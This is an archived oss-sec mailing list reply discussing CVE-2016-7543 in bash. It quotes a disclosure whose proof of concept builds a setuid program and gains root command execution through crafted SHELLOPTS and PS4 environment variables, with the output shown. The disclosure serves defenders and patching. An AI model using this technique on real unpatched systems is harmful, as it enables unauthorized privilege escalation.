oss-sec mailing list archives
Re: CVE-2016-7543 -- bash SHELLOPTS+PS4
From: Tavis Ormandy <taviso () cmpxchg8b com>
Date: Mon, 26 Sep 2016 16:01:03 -0700
up201407890 () alunos dcc fc up pt wrote:
The recent bash 4.4 patched an old attack vector regarding specially crafted SHELLOPTS+PS4 environment variables against bogus setuid binaries using system()/popen(). https://lists.gnu.org/archive/html/bug-bash/2016-09/msg00018.html "nn. Shells running as root no longer inherit PS4 from the environment, closing a security hole involving PS4 expansion performing command substitution." # gcc -xc - -otest <<< 'int main() { setuid(0); system("/bin/date"); }' # chmod 4755 ./test # ls -l ./test -rwsr-xr-x. 1 root root 8549 Sep 10 18:06 ./test # exit $ env -i SHELLOPTS=xtrace PS4='$(id)' ./test uid=0(root) Sat Sep 10 18:06:36 WET 2016 Sorry Tavis :P
Hah, nice work :-) Tavis.
Current thread:
- CVE-2016-7543 -- bash SHELLOPTS+PS4 up201407890 (Sep 26)
- Re: CVE-2016-7543 -- bash SHELLOPTS+PS4 Tavis Ormandy (Sep 26)